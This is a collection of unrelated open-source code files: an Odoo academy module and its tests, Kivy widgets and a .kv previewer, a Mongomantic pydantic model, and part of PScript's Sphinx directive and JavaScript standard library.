# Save data to M3U8 file
text_file = open('./public/output/channels.m3u8', "w+")
text_file.write("#EXTM3U" + "\n")
text_file.write("# @LaQuay https://github.com/LaQuay/TDTChannels" + "\n")
text_file.write(spain.to_m3u8())
text_file.close()
print("JSON + M3U8 Updated")
```
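The script above relies on a `stringbetween` helper defined earlier in the original file (not shown in this excerpt) to slice each section of the upstream README between two headings. A minimal sketch of what such a helper could look like, offered purely as an assumption about its behavior:
```python
# Hypothetical sketch of the stringbetween helper used above; the real
# implementation lives earlier in the original script and may differ.
def stringbetween(text, start_marker, end_marker):
    # Return the substring between the first occurrence of start_marker
    # and the next occurrence of end_marker (empty string if not found).
    start = text.find(start_marker)
    if start == -1:
        return ""
    start += len(start_marker)
    end = text.find(end_marker, start)
    if end == -1:
        return text[start:]
    return text[start:end]
```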
|
{
"source": "JesusZapata/academy",
"score": 2
}
|
#### File: academy/models/models.py
```python
from odoo import models, fields, api
class Teachers(models.Model):
_name = 'academy.teachers'
name = fields.Char()
biography = fields.Html()
course_ids = fields.One2many('product.template', 'teacher_id', string="Courses")
class Courses(models.Model):
_inherit = 'product.template'
name = fields.Char()
teacher_id = fields.Many2one('academy.teachers', string="Teacher")
# class academy(models.Model):
# _name = 'academy.academy'
# name = fields.Char()
# value = fields.Integer()
# value2 = fields.Float(compute="_value_pc", store=True)
# description = fields.Text()
#
# @api.depends('value')
# def _value_pc(self):
# self.value2 = float(self.value) / 100
```
|
{
"source": "JesusZapata/openacademy",
"score": 3
}
|
#### File: openacademy/tests/test_global_openacademy_course.py
```python
from psycopg2 import IntegrityError
from openerp.tests.common import TransactionCase
from openerp.tools import mute_logger
class GlobalOpenAcademyCourse(TransactionCase):
"""
Test Model Course
"""
def setUp(self):
super(GlobalOpenAcademyCourse, self).setUp()
self.course = self.env['openacademy.course']
def create_course(self, course_name, course_description,
course_responsible_id):
course_id = self.course.create({
'name': course_name,
'description': course_description,
'responsible_id': course_responsible_id,
})
return course_id
@mute_logger('openerp.sql_db')
def test_10_same_name_description(self):
"""
Test constraints name_description_check
"""
with self.assertRaisesRegexp(
IntegrityError,
'new row for relation "openacademy_course" violates'
' check constraint "openacademy_course_name_description_check"'
):
self.create_course('test', 'test', None)
@mute_logger('openerp.sql_db')
def test_20_two_courses_same_name(self):
"""
Test constraints name_unique
"""
self.create_course('test1', 'test_description', None)
with self.assertRaisesRegexp(
IntegrityError,
'duplicate key value violates unique'
' constraint "openacademy_course_name_unique"'
):
self.create_course('test1', 'test_description', None)
def test_15_duplicate_course(self):
"""
Test copy method
"""
course = self.env.ref('openacademy.course0')
course.copy()
```
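The two constraint tests above assume that the `openacademy.course` model declares SQL constraints named `name_description_check` and `name_unique`. A hedged sketch of how such constraints are typically declared on the model (the exact definition lives in the openacademy module itself and is not shown here):
```python
# Hypothetical sketch of the _sql_constraints exercised by the tests above;
# the real openacademy.course model may differ in fields and messages.
from openerp import fields, models


class Course(models.Model):
    _name = 'openacademy.course'

    name = fields.Char(required=True)
    description = fields.Text()
    responsible_id = fields.Many2one('res.users', string="Responsible")

    _sql_constraints = [
        ('name_description_check',
         'CHECK(name != description)',
         "The title of the course should not be the description"),
        ('name_unique',
         'UNIQUE(name)',
         "The course title must be unique"),
    ]
```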
|
{
"source": "JesusZerpa/kivy-recyclescrollview",
"score": 3
}
|
#### File: JesusZerpa/kivy-recyclescrollview/recyclescrollview.py
```python
from kivy.factory import Factory
from kivy.properties import *
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.boxlayout import BoxLayout
class RecycleScrollView(Factory.ScrollView):
viewclass=StringProperty("")
data=ListProperty([])
#box
orientation= 'vertical'
default_height= 1000
cursor=0
max_items=10
widget_height=None
def __init__(self,*args,**kwargs):
super(RecycleScrollView,self).__init__(*args,**kwargs)
self.do_scroll_y=True
self.box=BoxLayout(orientation="vertical",size_hint_y= None,height=self.default_height)
self.add_widget(self.box)
def on_parent(self,instance,value):
pass
def on_size(self,instance,value):
height=0
for elem in self.children[0].children:
height+=elem.height
self.children[0].height=height
def on_scroll_move(self,instance):
if self.widget_height:
dx=self.box.height-(self.scroll_y*self.box.height)
if dx>0:
item_passed=dx/self.widget_height
self.cursor=int(item_passed)
self.update()
return super().on_scroll_move(instance)
def on_scroll_stop(self,instance):
if self.widget_height:
dx=self.box.height-(self.scroll_y*self.box.height)
if dx>0:
item_passed=dx/self.widget_height
self.cursor=int(item_passed)
self.update()
return super().on_scroll_stop(instance)
def update(self):
self.clear_widgets()
widget=getattr(Factory,self.viewclass)
_widget=widget()
self.box=FloatLayout(size_hint_y= None,height=self.default_height)
super(RecycleScrollView,self).add_widget(self.box)
self.box.top=self.top
for k,item in enumerate(self.data[self.cursor:self.cursor+self.max_items]):
widget=getattr(Factory,self.viewclass)
_widget=widget()
_widget.size_hint_y=None
self.box.add_widget(_widget)
_widget.pos=(_widget.pos[0],(_widget.height*len(self.data))-(_widget.height*(self.cursor+k+1)))
for elem in item:
setattr(_widget,elem,item[elem])
self.box.height=self.widget_height*len(self.data)
def on_classview(self,instance,value):
instance.classview=value
def on_data(self,instance,value):
#button
#size_hint: (1, None)
#height: 200
self.data=value
for k,item in enumerate(self.data[self.cursor:self.cursor+self.max_items]):
widget=getattr(Factory,self.viewclass)
_widget=widget()
_widget.size_hint_y=None
for elem in item:
setattr(_widget,elem,item[elem])
if self.widget_height==None:
self.widget_height=_widget.height
self.box.add_widget(_widget)
```
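A minimal usage sketch for the widget above; the `Row` item class and its kv rule are illustrative assumptions, and only `viewclass` and `data` mirror the properties actually shown in the code:
```python
# Hypothetical usage sketch for RecycleScrollView; Row and its kv rule are
# made up for illustration, only viewclass/data come from the class above.
from kivy.app import App
from kivy.lang import Builder
from recyclescrollview import RecycleScrollView

Builder.load_string("""
<Row@Label>:
    size_hint_y: None
    height: 40
""")


class DemoApp(App):
    def build(self):
        view = RecycleScrollView(viewclass="Row")
        # Each dict maps attribute names to values set on every Row widget.
        view.data = [{"text": "item %d" % i} for i in range(200)]
        return view


if __name__ == "__main__":
    DemoApp().run()
```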
|
{
"source": "JesusZerpa/kivy-web-syntax-sublime-text",
"score": 2
}
|
#### File: kivy-web-syntax-sublime-text/preview/kv.preview.py
```python
import os
import sys
try:
import kivy
except ImportError as e:
sys.exit(1)
from kivy.app import App
from kivy.clock import Clock
from kivy.core.window import Window
from kivy.lang import Builder
from kivy.properties import ObjectProperty
from kivy.uix.boxlayout import BoxLayout
Window.size = (800, 600)
class InterfaceManager(BoxLayout):
pass
class PreviewApp(App):
stats = ObjectProperty(None)
def __init__(self, filename):
super(PreviewApp, self).__init__()
self.filename = filename
self.root = InterfaceManager()
Clock.schedule_interval(self.update_ui, .5)
def on_stats(self, instance, value):
self.root.clear_widgets()
self.root.add_widget(Builder.load_file(self.filename))
def update_ui(self, dt):
self.stats = os.stat(self.filename)
def build(self):
pass
if __name__ == '__main__':
from importlib import import_module
sys.path.append(sys.argv[2])
file_path = os.path.dirname(os.path.realpath(sys.argv[1]))
sys.path.append(os.getcwd())
sys.path.append(file_path)
if os.path.isfile(os.path.join(sys.argv[2], 'main.py')) or \
os.path.isfile(os.path.join(os.getcwd(), 'main.py')):
import_module('main')
app = PreviewApp(sys.argv[1])
app.run()
```
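The preview script expects the .kv file to watch as its first command-line argument and a project directory (added to sys.path and scanned for a main.py) as its second. A hedged invocation sketch, with the file and directory names made up for illustration:
```python
# Hypothetical way to launch the previewer from another Python process; it is
# normally run directly as: python kv.preview.py my_ui.kv /path/to/project
import subprocess

subprocess.run(["python", "kv.preview.py", "my_ui.kv", "/path/to/project"])
```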
|
{
"source": "JesusZerpa/Mongomantic",
"score": 3
}
|
#### File: mongomantic/core/mongo_model.py
```python
from typing import Any, Dict, Optional, Type
from abc import ABC
from datetime import datetime
from bson import ObjectId
from bson.objectid import InvalidId
from pydantic import BaseConfig, BaseModel
class OID:
@classmethod
def __get_validators__(cls):
yield cls.validate
@classmethod
def validate(cls, v):
try:
return ObjectId(str(v))
except InvalidId:
raise ValueError("Invalid object ID")
class MongoDBModel(BaseModel, ABC):
id: Optional[OID]
class Config(BaseConfig):
allow_population_by_field_name = True
json_encoders = {
datetime: lambda dt: dt.isoformat(),
ObjectId: str,
}
@classmethod
def from_mongo(cls, data: Dict[str, Any]) -> Optional["MongoDBModel"]:
"""Constructs a pydantic object from mongodb compatible dictionary"""
if not data:
return None
id = data.pop("_id", None) # Convert _id into id
return cls(**dict(data, id=id))
def to_mongo(self, **kwargs):
"""Maps a pydantic model to a mongodb compatible dictionary"""
exclude_unset = kwargs.pop(
"exclude_unset",
False, # Set as false so that default values are also stored
)
by_alias = kwargs.pop(
"by_alias", True
) # whether field aliases should be used as keys in the returned dictionary
# Converting the model to a dictionary
parsed = self.dict(by_alias=by_alias, exclude_unset=exclude_unset, **kwargs)
# Mongo uses `_id` as default key.
# if "_id" not in parsed and "id" in parsed:
# parsed["_id"] = parsed.pop("id")
if "id" in parsed:
parsed.pop("id")
return parsed
def dict(self, **kwargs):
"""Override self.dict to hide some fields that are used as metadata"""
hidden_fields = {"_collection"}
kwargs.setdefault("exclude", hidden_fields)
return super().dict(**kwargs)
```
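A brief, hedged usage sketch for the `from_mongo`/`to_mongo` pair above; the `User` model and its fields are illustrative assumptions rather than part of Mongomantic:
```python
# Hypothetical usage sketch for MongoDBModel; the User model is made up
# for illustration and is not part of the library.
from bson import ObjectId
from mongomantic.core.mongo_model import MongoDBModel


class User(MongoDBModel):
    name: str
    age: int


# A raw document as returned by pymongo: _id is mapped onto the id field.
raw = {"_id": ObjectId(), "name": "Ada", "age": 36}
user = User.from_mongo(raw)
print(user.id, user.name)

# Going back to MongoDB, the id key is stripped from the resulting dict.
doc = user.to_mongo()
assert "id" not in doc and "_id" not in doc
```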
|
{
"source": "JesusZerpa/pscript",
"score": 3
}
|
#### File: docs/scripts/pscriptexample.py
```python
import os
import hashlib
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.formatters import HtmlFormatter
from docutils.parsers.rst import Directive
from docutils import nodes
from pscript import py2js
pythonLexer, javaScriptLexer = get_lexer_by_name('py'), get_lexer_by_name('js')
htmlFormatter = HtmlFormatter()
#
# THIS_DIR = os.path.abspath(os.path.dirname(__file__))
# HTML_DIR = os.path.abspath(os.path.join(THIS_DIR, '..', '_build', 'html'))
#
# if not os.path.isdir(HTML_DIR + '/ui'):
# os.mkdir(HTML_DIR + '/ui')
#
# if not os.path.isdir(HTML_DIR + '/ui/examples'):
# os.mkdir(HTML_DIR + '/ui/examples')
def my_highlight(code):
return highlight(code, pythonLexer, htmlFormatter)
class pscript_example(nodes.raw): pass
def visit_pscript_example_html(self, node):
# Fix for rtd
if not hasattr(node, 'code'):
return
# Get code
code = node.code.strip() + '\n'
# Split in parts (blocks between two newlines)
lines = [line.rstrip() for line in code.splitlines()]
code = '\n'.join(lines)
parts = code.split('\n\n')
td_style1 = "style='vertical-align:top; min-width:300px;'"
td_style2 = "style='vertical-align:top;'"
pre_style = "style='margin:2px; padding: 2px; border:0px;'"
#self.body.append("<style> div.hiddenjs {height: 1.2em; width: 2em; overflow:hidden; font-size: small;} div.hiddenjs:hover {height: initial; width: initial;} div.hiddenjs:hover > .ph {display:none;} </style>\n")
self.body.append("<style> div.hiddenjs {overflow:hidden; font-size: small; min-width:200px; min-height:30px;} div.hiddenjs > .js {display:none} div.hiddenjs:hover > .js {display:block} div.hiddenjs:hover > .ph {display:none;} </style>\n")
self.body.append("<table>")
#self.body.append("<tr><td style='text-align:right;'> <i>PScript</i> </td><td> <i>JS</i> </td></tr>")
for py in parts:
if py.strip().startswith('##'):
lines = [line.lstrip(' \n#\t') for line in py.splitlines()]
lines[0] = '<b>%s</b><br />' % lines[0]
text = ''.join(lines)
self.body.append('<tr><td %s>%s</td><td %s></td></tr>' %
(td_style1, text, td_style2))
continue
js = py2js(py)
py_html = highlight(py, pythonLexer, htmlFormatter)
js_html = highlight(js, javaScriptLexer, htmlFormatter)
py_html = py_html.replace("<pre>", '<pre %s>' % pre_style)
js_html = js_html.replace("<pre>", '<pre %s>' % pre_style)
js_html = "<div class='hiddenjs'><div class='ph'>JS</div> <div class='js'>%s</div> </div>" % js_html
#self.body.append("%s <div class='hiddenjs'><a> </a> %s</div>" % (py_html, js_html))
self.body.append("<tr><td %s>%s</td><td %s>%s</td></tr>" %
(td_style1, py_html, td_style2, js_html))
self.body.append("</table>")
def depart_pscript_example_html(self, node):
pass
class PscriptExampleDirective(Directive):
has_content = True
def run(self):
# Get code and extact height
code = '\n'.join(self.content)
try:
height = int(self.content[0])
except Exception:
height = 300
else:
code = code.split('\n', 1)[1].strip()
# iframe
table = pscript_example('')
table.code = code
return[table]
def setup(Sphynx):
#Sphynx.add_javascript('js-image-slider.js')
#Sphynx.add_stylesheet('js-image-slider.css')
Sphynx.add_node(pscript_example, html=(visit_pscript_example_html, depart_pscript_example_html))
Sphynx.add_directive('pscript_example', PscriptExampleDirective)
```
#### File: pscript/pscript/stdlib.py
```python
import re
# Functions not covered by this lib:
# isinstance, issubclass, print, len, max, min, callable, chr, ord
FUNCTIONS = {}
METHODS = {}
FUNCTION_PREFIX = '_pyfunc_'
METHOD_PREFIX = '_pymeth_'
def get_std_info(code):
""" Given the JS code for a std function or method, determine the
number of arguments, function_deps and method_deps.
"""
_, _, nargs = code.splitlines()[0].partition('nargs:')
nargs = [int(i.strip()) for i in nargs.strip().replace(',', ' ').split(' ') if i]
# Collect dependencies on other funcs/methods
sep = FUNCTION_PREFIX
function_deps = [part.split('(')[0].strip() for part in code.split(sep)[1:]]
sep = METHOD_PREFIX
method_deps = [part.split('.')[0].strip() for part in code.split(sep)[1:]]
# Reduce and sort
function_deps = sorted(set(function_deps))
method_deps = sorted(set(method_deps))
# Filter
function_deps = [dep for dep in function_deps if dep not in method_deps]
function_deps = set([dep for dep in function_deps if dep in FUNCTIONS])
method_deps = set([dep for dep in method_deps if dep in METHODS])
# Recurse
for dep in list(function_deps):
_update_deps(FUNCTIONS[dep], function_deps, method_deps)
for dep in list(method_deps):
_update_deps(METHODS[dep], function_deps, method_deps)
return nargs, sorted(function_deps), sorted(method_deps)
def _update_deps(code, function_deps, method_deps):
""" Given the code of a dependency, recursively resolve additional dependencies.
"""
# Collect deps
sep = FUNCTION_PREFIX
new_function_deps = [part.split('(')[0].strip() for part in code.split(sep)[1:]]
sep = METHOD_PREFIX
new_method_deps = [part.split('.')[0].strip() for part in code.split(sep)[1:]]
# Update
new_function_deps = set(new_function_deps).difference(function_deps)
new_method_deps = set(new_method_deps).difference(method_deps)
function_deps.update(new_function_deps)
method_deps.update(new_method_deps)
# Recurse
for dep in new_function_deps:
_update_deps(FUNCTIONS[dep], function_deps, method_deps)
for dep in new_method_deps:
_update_deps(METHODS[dep], function_deps, method_deps)
return function_deps, method_deps
def get_partial_std_lib(func_names, method_names, indent=0,
func_prefix=None, method_prefix=None):
""" Get the code for the PScript standard library consisting of
the given function and method names. The given indent specifies how
many sets of 4 spaces to prepend.
"""
func_prefix = 'var ' + FUNCTION_PREFIX if (func_prefix is None) else func_prefix
method_prefix = 'var ' + METHOD_PREFIX if (method_prefix is None) else method_prefix
lines = []
for name in sorted(func_names):
code = FUNCTIONS[name].strip()
if '\n' not in code:
code = code.rsplit('//', 1)[0].rstrip() # strip comment from one-liners
lines.append('%s%s = %s;' % (func_prefix, name, code))
for name in sorted(method_names):
code = METHODS[name].strip()
# lines.append('Object.prototype.%s%s = %s;' % (METHOD_PREFIX, name, code))
lines.append('%s%s = %s;' % (method_prefix, name, code))
code = '\n'.join(lines)
if indent:
lines = [' '*indent + line for line in code.splitlines()]
code = '\n'.join(lines)
return code
def get_full_std_lib(indent=0):
""" Get the code for the full PScript standard library.
The given indent specifies how many sets of 4 spaces to prepend.
If the full stdlib is made available in JavaScript, multiple
snippets of code can be transpiled without inlined stdlib parts by
using ``py2js(..., inline_stdlib=False)``.
"""
return get_partial_std_lib(FUNCTIONS.keys(), METHODS.keys(), indent)
# todo: now that we have modules, we can have shorter/no prefixes, right?
# -> though maybe we use them for string replacement somewhere?
def get_all_std_names():
""" Get list if function names and methods names in std lib.
"""
return ([FUNCTION_PREFIX + f for f in FUNCTIONS],
[METHOD_PREFIX + f for f in METHODS])
## ----- Functions
## Special functions: not really in builtins, but important enough to support
FUNCTIONS['perf_counter'] = """function() { // nargs: 0
if (typeof(process) === "undefined"){return performance.now()*1e-3;}
else {var t = process.hrtime(); return t[0] + t[1]*1e-9;}
}""" # Work in nodejs and browser
FUNCTIONS['time'] = """function () {return Date.now() / 1000;} // nargs: 0"""
## Hardcore functions
FUNCTIONS['op_instantiate'] = """function (ob, args) { // nargs: 2
if ((typeof ob === "undefined") ||
(typeof window !== "undefined" && window === ob) ||
(typeof global !== "undefined" && global === ob))
{throw "Class constructor is called as a function.";}
for (var name in ob) {
if (Object[name] === undefined &&
typeof ob[name] === 'function' && !ob[name].nobind) {
ob[name] = ob[name].bind(ob);
ob[name].__name__ = name;
}
}
if (ob.__init__) {
ob.__init__.apply(ob, args);
}
}"""
FUNCTIONS['create_dict'] = """function () {
var d = {};
for (var i=0; i<arguments.length; i+=2) { d[arguments[i]] = arguments[i+1]; }
return d;
}"""
FUNCTIONS['merge_dicts'] = """function () {
var res = {};
for (var i=0; i<arguments.length; i++) {
var d = arguments[i];
var key, keys = Object.keys(d);
for (var j=0; j<keys.length; j++) { key = keys[j]; res[key] = d[key]; }
}
return res;
}"""
# args is a list of (name, default) tuples, and is overwritten with names from kwargs
FUNCTIONS['op_parse_kwargs'] = """
function (arg_names, arg_values, kwargs, strict) { // nargs: 3
for (var i=0; i<arg_values.length; i++) {
var name = arg_names[i];
if (kwargs[name] !== undefined) {
arg_values[i] = kwargs[name];
delete kwargs[name];
}
}
if (strict && Object.keys(kwargs).length > 0) {
throw FUNCTION_PREFIXop_error('TypeError',
'Function ' + strict + ' does not accept **kwargs.');
}
return kwargs;
}""".lstrip()
FUNCTIONS['op_error'] = """function (etype, msg) { // nargs: 2
var e = new Error(etype + ': ' + msg);
e.name = etype
return e;
}"""
FUNCTIONS['hasattr'] = """function (ob, name) { // nargs: 2
return (ob !== undefined) && (ob !== null) && (ob[name] !== undefined);
}"""
FUNCTIONS['getattr'] = """function (ob, name, deflt) { // nargs: 2 3
var has_attr = ob !== undefined && ob !== null && ob[name] !== undefined;
if (has_attr) {return ob[name];}
else if (arguments.length == 3) {return deflt;}
else {var e = Error(name); e.name='AttributeError'; throw e;}
}"""
FUNCTIONS['setattr'] = """function (ob, name, value) { // nargs: 3
ob[name] = value;
}"""
FUNCTIONS['delattr'] = """function (ob, name) { // nargs: 2
delete ob[name];
}"""
FUNCTIONS['dict'] = """function (x) {
var t, i, keys, r={};
if (Array.isArray(x)) {
for (i=0; i<x.length; i++) {
t=x[i]; r[t[0]] = t[1];
}
} else {
keys = Object.keys(x);
for (i=0; i<keys.length; i++) {
t=keys[i]; r[t] = x[t];
}
}
return r;
}"""
FUNCTIONS['list'] = """function (x) {
var r=[];
if (typeof x==="object" && !Array.isArray(x)) {x = Object.keys(x)}
for (var i=0; i<x.length; i++) {
r.push(x[i]);
}
return r;
}"""
FUNCTIONS['range'] = """function (start, end, step) {
var i, res = [];
var val = start;
var n = (end - start) / step;
for (i=0; i<n; i++) {
res.push(val);
val += step;
}
return res;
}"""
FUNCTIONS['format'] = """function (v, fmt) { // nargs: 2
fmt = fmt.toLowerCase();
var s = String(v);
if (fmt.indexOf('!r') >= 0) {
try { s = JSON.stringify(v); } catch (e) { s = undefined; }
if (typeof s === 'undefined') { s = v._IS_COMPONENT ? v.id : String(v); }
}
var fmt_type = '';
if (fmt.slice(-1) == 'i' || fmt.slice(-1) == 'f' ||
fmt.slice(-1) == 'e' || fmt.slice(-1) == 'g') {
fmt_type = fmt[fmt.length-1]; fmt = fmt.slice(0, fmt.length-1);
}
var i0 = fmt.indexOf(':');
var i1 = fmt.indexOf('.');
var spec1 = '', spec2 = ''; // before and after dot
if (i0 >= 0) {
if (i1 > i0) { spec1 = fmt.slice(i0+1, i1); spec2 = fmt.slice(i1+1); }
else { spec1 = fmt.slice(i0+1); }
}
// Format numbers
if (fmt_type == '') {
} else if (fmt_type == 'i') { // integer formatting, for %i
s = parseInt(v).toFixed(0);
} else if (fmt_type == 'f') { // float formatting
v = parseFloat(v);
var decimals = spec2 ? Number(spec2) : 6;
s = v.toFixed(decimals);
} else if (fmt_type == 'e') { // exp formatting
v = parseFloat(v);
var precision = (spec2 ? Number(spec2) : 6) || 1;
s = v.toExponential(precision);
} else if (fmt_type == 'g') { // "general" formatting
v = parseFloat(v);
var precision = (spec2 ? Number(spec2) : 6) || 1;
// Exp or decimal?
s = v.toExponential(precision-1);
var s1 = s.slice(0, s.indexOf('e')), s2 = s.slice(s.indexOf('e'));
if (s2.length == 3) { s2 = 'e' + s2[1] + '0' + s2[2]; }
var exp = Number(s2.slice(1));
if (exp >= -4 && exp < precision) { s1=v.toPrecision(precision); s2=''; }
// Skip trailing zeros and dot
var j = s1.length-1;
while (j>0 && s1[j] == '0') { j-=1; }
s1 = s1.slice(0, j+1);
if (s1.slice(-1) == '.') { s1 = s1.slice(0, s1.length-1); }
s = s1 + s2;
}
// prefix/padding
var prefix = '';
if (spec1) {
if (spec1[0] == '+' && v > 0) { prefix = '+'; spec1 = spec1.slice(1); }
else if (spec1[0] == ' ' && v > 0) { prefix = ' '; spec1 = spec1.slice(1); }
}
if (spec1 && spec1[0] == '0') {
var padding = Number(spec1.slice(1)) - (s.length + prefix.length);
s = '0'.repeat(Math.max(0, padding)) + s;
}
return prefix + s;
}"""
## Normal functions
FUNCTIONS['pow'] = 'Math.pow // nargs: 2'
FUNCTIONS['sum'] = """function (x) { // nargs: 1
return x.reduce(function(a, b) {return a + b;});
}"""
FUNCTIONS['round'] = 'Math.round // nargs: 1'
FUNCTIONS['int'] = """function (x, base) { // nargs: 1 2
if(base !== undefined) return parseInt(x, base);
return x<0 ? Math.ceil(x): Math.floor(x);
}"""
FUNCTIONS['float'] = 'Number // nargs: 1'
FUNCTIONS['str'] = 'String // nargs: 0 1'
# Note use of "_IS_COMPONENT" to check for flexx.app component classes.
FUNCTIONS['repr'] = """function (x) { // nargs: 1
var res; try { res = JSON.stringify(x); } catch (e) { res = undefined; }
if (typeof res === 'undefined') { res = x._IS_COMPONENT ? x.id : String(x); }
return res;
}"""
FUNCTIONS['bool'] = """function (x) { // nargs: 1
return Boolean(FUNCTION_PREFIXtruthy(x));
}"""
FUNCTIONS['abs'] = 'Math.abs // nargs: 1'
FUNCTIONS['divmod'] = """function (x, y) { // nargs: 2
var m = x % y; return [(x-m)/y, m];
}"""
FUNCTIONS['all'] = """function (x) { // nargs: 1
for (var i=0; i<x.length; i++) {
if (!FUNCTION_PREFIXtruthy(x[i])){return false;}
} return true;
}"""
FUNCTIONS['any'] = """function (x) { // nargs: 1
for (var i=0; i<x.length; i++) {
if (FUNCTION_PREFIXtruthy(x[i])){return true;}
} return false;
}"""
FUNCTIONS['enumerate'] = """function (iter) { // nargs: 1
var i, res=[];
if ((typeof iter==="object") && (!Array.isArray(iter))) {iter = Object.keys(iter);}
for (i=0; i<iter.length; i++) {res.push([i, iter[i]]);}
return res;
}"""
FUNCTIONS['zip'] = """function () { // nargs: 2 3 4 5 6 7 8 9
var i, j, tup, arg, args = [], res = [], len = 1e20;
for (i=0; i<arguments.length; i++) {
arg = arguments[i];
if ((typeof arg==="object") && (!Array.isArray(arg))) {arg = Object.keys(arg);}
args.push(arg);
len = Math.min(len, arg.length);
}
for (j=0; j<len; j++) {
tup = []
for (i=0; i<args.length; i++) {tup.push(args[i][j]);}
res.push(tup);
}
return res;
}"""
FUNCTIONS['reversed'] = """function (iter) { // nargs: 1
if ((typeof iter==="object") && (!Array.isArray(iter))) {iter = Object.keys(iter);}
return iter.slice().reverse();
}"""
FUNCTIONS['sorted'] = """function (iter, key, reverse) { // nargs: 1 2 3
if ((typeof iter==="object") && (!Array.isArray(iter))) {iter = Object.keys(iter);}
var comp = function (a, b) {a = key(a); b = key(b);
if (a<b) {return -1;} if (a>b) {return 1;} return 0;};
comp = Boolean(key) ? comp : undefined;
iter = iter.slice().sort(comp);
if (reverse) iter.reverse();
return iter;
}"""
FUNCTIONS['filter'] = """function (func, iter) { // nargs: 2
if (typeof func === "undefined" || func === null) {func = function(x) {return x;}}
if ((typeof iter==="object") && (!Array.isArray(iter))) {iter = Object.keys(iter);}
return iter.filter(func);
}"""
FUNCTIONS['map'] = """function (func, iter) { // nargs: 2
if (typeof func === "undefined" || func === null) {func = function(x) {return x;}}
if ((typeof iter==="object") && (!Array.isArray(iter))) {iter = Object.keys(iter);}
return iter.map(func);
}"""
## Other / Helper functions
FUNCTIONS['truthy'] = """function (v) {
if (v === null || typeof v !== "object") {return v;}
else if (v.length !== undefined) {return v.length ? v : false;}
else if (v.byteLength !== undefined) {return v.byteLength ? v : false;}
else if (v.constructor !== Object) {return true;}
else {return Object.getOwnPropertyNames(v).length ? v : false;}
}"""
FUNCTIONS['op_equals'] = """function op_equals (a, b) { // nargs: 2
var a_type = typeof a;
// If a (or b actually) is of type string, number or boolean, we don't need
// to do all the other type checking below.
if (a_type === "string" || a_type === "boolean" || a_type === "number") {
return a == b;
}
if (a == null || b == null) {
} else if (Array.isArray(a) && Array.isArray(b)) {
var i = 0, iseq = a.length == b.length;
while (iseq && i < a.length) {iseq = op_equals(a[i], b[i]); i+=1;}
return iseq;
} else if (a.constructor === Object && b.constructor === Object) {
var akeys = Object.keys(a), bkeys = Object.keys(b);
akeys.sort(); bkeys.sort();
var i=0, k, iseq = op_equals(akeys, bkeys);
while (iseq && i < akeys.length)
{k=akeys[i]; iseq = op_equals(a[k], b[k]); i+=1;}
return iseq;
} return a == b;
}"""
FUNCTIONS['op_contains'] = """function op_contains (a, b) { // nargs: 2
if (b == null) {
} else if (Array.isArray(b)) {
for (var i=0; i<b.length; i++) {if (FUNCTION_PREFIXop_equals(a, b[i]))
return true;}
return false;
} else if (b.constructor === Object) {
for (var k in b) {if (a == k) return true;}
return false;
} else if (b.constructor == String) {
return b.indexOf(a) >= 0;
} var e = Error('Not a container: ' + b); e.name='TypeError'; throw e;
}"""
FUNCTIONS['op_add'] = """function (a, b) { // nargs: 2
if (Array.isArray(a) && Array.isArray(b)) {
return a.concat(b);
} return a + b;
}"""
FUNCTIONS['op_mult'] = """function (a, b) { // nargs: 2
if ((typeof a === 'number') + (typeof b === 'number') === 1) {
if (a.constructor === String) return METHOD_PREFIXrepeat(a, b);
if (b.constructor === String) return METHOD_PREFIXrepeat(b, a);
if (Array.isArray(b)) {var t=a; a=b; b=t;}
if (Array.isArray(a)) {
var res = []; for (var i=0; i<b; i++) res = res.concat(a);
return res;
}
} return a * b;
}"""
## ----- Methods
## List only
METHODS['append'] = """function (x) { // nargs: 1
if (!Array.isArray(this)) return this.KEY.apply(this, arguments);
this.push(x);
}"""
METHODS['extend'] = """function (x) { // nargs: 1
if (!Array.isArray(this)) return this.KEY.apply(this, arguments);
this.push.apply(this, x);
}"""
METHODS['insert'] = """function (i, x) { // nargs: 2
if (!Array.isArray(this)) return this.KEY.apply(this, arguments);
i = (i < 0) ? this.length + i : i;
this.splice(i, 0, x);
}"""
METHODS['remove'] = """function (x) { // nargs: 1
if (!Array.isArray(this)) return this.KEY.apply(this, arguments);
for (var i=0; i<this.length; i++) {
if (FUNCTION_PREFIXop_equals(this[i], x)) {this.splice(i, 1); return;}
}
var e = Error(x); e.name='ValueError'; throw e;
}"""
METHODS['reverse'] = """function () { // nargs: 0
this.reverse();
}"""
METHODS['sort'] = """function (key, reverse) { // nargs: 0 1 2
if (!Array.isArray(this)) return this.KEY.apply(this, arguments);
var comp = function (a, b) {a = key(a); b = key(b);
if (a<b) {return -1;} if (a>b) {return 1;} return 0;};
comp = Boolean(key) ? comp : undefined;
this.sort(comp);
if (reverse) this.reverse();
}"""
## List and dict
METHODS['clear'] = """function () { // nargs: 0
if (Array.isArray(this)) {
this.splice(0, this.length);
} else if (this.constructor === Object) {
var keys = Object.keys(this);
for (var i=0; i<keys.length; i++) delete this[keys[i]];
} else return this.KEY.apply(this, arguments);
}"""
METHODS['copy'] = """function () { // nargs: 0
if (Array.isArray(this)) {
return this.slice(0);
} else if (this.constructor === Object) {
var key, keys = Object.keys(this), res = {};
for (var i=0; i<keys.length; i++) {key = keys[i]; res[key] = this[key];}
return res;
} else return this.KEY.apply(this, arguments);
}"""
METHODS['pop'] = """function (i, d) { // nargs: 1 2
if (Array.isArray(this)) {
i = (i === undefined) ? -1 : i;
i = (i < 0) ? (this.length + i) : i;
var popped = this.splice(i, 1);
if (popped.length) return popped[0];
var e = Error(i); e.name='IndexError'; throw e;
} else if (this.constructor === Object) {
var res = this[i]
if (res !== undefined) {delete this[i]; return res;}
else if (d !== undefined) return d;
var e = Error(i); e.name='KeyError'; throw e;
} else return this.KEY.apply(this, arguments);
}"""
## List and str
# start and stop are not supported for list in Python, but we allow them for simplicity
METHODS['count'] = """function (x, start, stop) { // nargs: 1 2 3
start = (start === undefined) ? 0 : start;
stop = (stop === undefined) ? this.length : stop;
start = Math.max(0, ((start < 0) ? this.length + start : start));
stop = Math.min(this.length, ((stop < 0) ? this.length + stop : stop));
if (Array.isArray(this)) {
var count = 0;
for (var i=0; i<this.length; i++) {
if (FUNCTION_PREFIXop_equals(this[i], x)) {count+=1;}
} return count;
} else if (this.constructor == String) {
var count = 0, i = start;
while (i >= 0 && i < stop) {
i = this.indexOf(x, i);
if (i < 0) break;
count += 1;
i += Math.max(1, x.length);
} return count;
} else return this.KEY.apply(this, arguments);
}"""
METHODS['index'] = """function (x, start, stop) { // nargs: 1 2 3
start = (start === undefined) ? 0 : start;
stop = (stop === undefined) ? this.length : stop;
